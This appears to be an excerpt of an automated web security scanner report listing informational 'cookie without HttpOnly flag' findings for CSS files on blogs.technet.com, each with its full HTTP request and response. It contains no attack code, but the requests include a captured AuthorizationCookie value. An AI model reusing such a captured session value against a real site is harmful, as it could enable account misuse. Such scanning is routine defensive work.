Last-Modified: Sat, 26 Mar 2011 01:46:07 GMT
ETag: 634367007671169102
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a46%3a07+GMT; expires=Sun, 25-Mar-2012 01:46:07 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:46:06 GMT
Content-Length: 3494


.content-fragment { margin: 10px; }

.layout-content.content-left-sidebar-right .layout-region.content .content-fragment,
.layout-content.sidebar-left-content-right .layout-region.left-side
...[SNIP]...
15.104. http://blogs.technet.com/themes/TechNet/css/base.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/css/base.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/css/base.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:52 GMT
Accept-Ranges: bytes
ETag: "0b415e862becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT; expires=Sun, 25-Mar-2012 01:20:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:40 GMT
Content-Length: 29305

html, body { margin: 0; padding: 0; text-align: left; font-size: 0.87em; font-family:Arial; color: #333; }
a:link, a:visited, a:active { outline: none; color: #06d; text-decoration: none; font-weigh
...[SNIP]...
15.105. http://blogs.technet.com/themes/TechNet/css/content-fragments-core.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/css/content-fragments-core.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/css/content-fragments-core.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:52 GMT
Accept-Ranges: bytes
ETag: "0b415e862becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT; expires=Sun, 25-Mar-2012 01:20:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:42 GMT
Content-Length: 46321

.../* $Title
/******************************/
.content-fragment.title { display: none; }

/* $Bread Crumbs
/******************************/
.content-fragment.bread-crumbs { margin: 0; }

/* $E
...[SNIP]...
15.106. http://blogs.technet.com/themes/TechNet/css/content-fragments-forums.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/css/content-fragments-forums.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/css/content-fragments-forums.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:52 GMT
Accept-Ranges: bytes
ETag: "0b415e862becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT; expires=Sun, 25-Mar-2012 01:20:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:42 GMT
Content-Length: 49130

/* $Forum Title
/******************************/
.content-fragment.forum-title { display: none; }

/* $Forum Banner
/******************************/
.content-fragment.forum-banner { margin: 0; }
...[SNIP]...
15.107. http://blogs.technet.com/themes/TechNet/css/content-fragments-groups.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/css/content-fragments-groups.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/css/content-fragments-groups.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:52 GMT
Accept-Ranges: bytes
ETag: "0b415e862becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT; expires=Sun, 25-Mar-2012 01:20:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:42 GMT
Content-Length: 18864

/* $Group Application Links
/******************************/
.content-fragment.group-application-navigation { position: relative; }
   .content-fragment.group-application-navigation .navigation-list
...[SNIP]...
15.108. http://blogs.technet.com/themes/TechNet/css/content-fragments-mediagalleries.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/css/content-fragments-mediagalleries.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/css/content-fragments-mediagalleries.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:52 GMT
Accept-Ranges: bytes
ETag: "0b415e862becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT; expires=Sun, 25-Mar-2012 01:20:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:42 GMT
Content-Length: 35321

/* $Media Gallery Title
/******************************/
.content-fragment.media-gallery-title { display: none; }

/* $Media Gallery Banner
/******************************/
.content-fragment.med
...[SNIP]...
15.109. http://blogs.technet.com/themes/TechNet/css/content-fragments-messages.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/css/content-fragments-messages.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/css/content-fragments-messages.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:52 GMT
Accept-Ranges: bytes
ETag: "0b415e862becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT; expires=Sun, 25-Mar-2012 01:31:57 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:43 GMT
Content-Length: 28331

/* $Activity Message List
/******************************/
.content-fragment.activity-message-list { position: relative; height: 1%; }
   .content-fragment.activity-message-list .user-avatar { displa
...[SNIP]...
15.110. http://blogs.technet.com/themes/TechNet/css/content-fragments-weblogs.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/css/content-fragments-weblogs.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/css/content-fragments-weblogs.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:52 GMT
Accept-Ranges: bytes
ETag: "0b415e862becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT; expires=Sun, 25-Mar-2012 01:31:57 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:42 GMT
Content-Length: 38670

/* $Blog News
/******************************/
.content-fragment.blog-news .page { padding: 0; margin: 0; }
.content-fragment.blog-news .page-content { padding: 0; margin: 0; }

/* $Blog Title
/
...[SNIP]...
15.111. http://blogs.technet.com/themes/TechNet/css/content-fragments-wikis.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/css/content-fragments-wikis.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/css/content-fragments-wikis.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:52 GMT
Accept-Ranges: bytes
ETag: "0b415e862becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT; expires=Sun, 25-Mar-2012 01:20:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:43 GMT
Content-Length: 24464

/* $Wiki Title
/******************************/
.content-fragment.wiki-title { display: none; }

/* $Wiki Banner
/******************************/
.content-fragment.wiki-banner .content-fragment-
...[SNIP]...
15.112. http://blogs.technet.com/themes/TechNet/css/content-fragments.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/css/content-fragments.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/css/content-fragments.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:52 GMT
Accept-Ranges: bytes
ETag: "0b415e862becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT; expires=Sun, 25-Mar-2012 01:20:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:40 GMT
Content-Length: 331

...@import url('content-fragments-core.css');
@import url('content-fragments-forums.css');
@import url('content-fragments-groups.css');
@import url('content-fragments-mediagalleries.css');
@import
...[SNIP]...
15.113. http://blogs.technet.com/themes/TechNet/css/footer-fragments.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/css/footer-fragments.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/css/footer-fragments.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:52 GMT
Accept-Ranges: bytes
ETag: "0b415e862becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT; expires=Sun, 25-Mar-2012 01:20:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:40 GMT
Content-Length: 3667

.../* $Footer-Fragments
/******************************/
.footer-fragments { display: block; position: relative; padding: 10px; margin: 0 auto; }
.footer-fragments-header { border-top: solid 1px #c
...[SNIP]...
15.114. http://blogs.technet.com/themes/TechNet/css/header-fragments.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/css/header-fragments.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/css/header-fragments.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:52 GMT
Accept-Ranges: bytes
ETag: "0b415e862becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT; expires=Sun, 25-Mar-2012 01:20:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:40 GMT
Content-Length: 18751

/* $Header-Fragments
/******************************/
.header-fragments { background-color: #fff; }
.fiji-header-fragment-inner { position: relative; width: 960px; margin: 0 auto; }

.fiji-header
...[SNIP]...
15.115. http://blogs.technet.com/themes/TechNet/css/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/css/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/css/print.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a38+GMT; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:52 GMT
Accept-Ranges: bytes
ETag: "0b415e862becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT; expires=Sun, 25-Mar-2012 01:20:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:39 GMT
Content-Length: 7484

.layout, .page-editing, .page-tabs, .admin-bar .navigation-list, .admin-bar fieldset.field-list, .fiji-header-fragment-inner, .poweredby-wrapper, .footer-fragments, .footer-fragments-header, .footer-f
...[SNIP]...
15.116. http://blogs.technet.com/themes/TechNet/css/screen.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/css/screen.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/css/screen.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a38+GMT; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:52 GMT
Accept-Ranges: bytes
ETag: "bad038e862becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT; expires=Sun, 25-Mar-2012 01:20:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:38 GMT
Content-Length: 143

@import url('base.css');
@import url('header-fragments.css');
@import url('content-fragments.css');
@import url('footer-fragments.css');

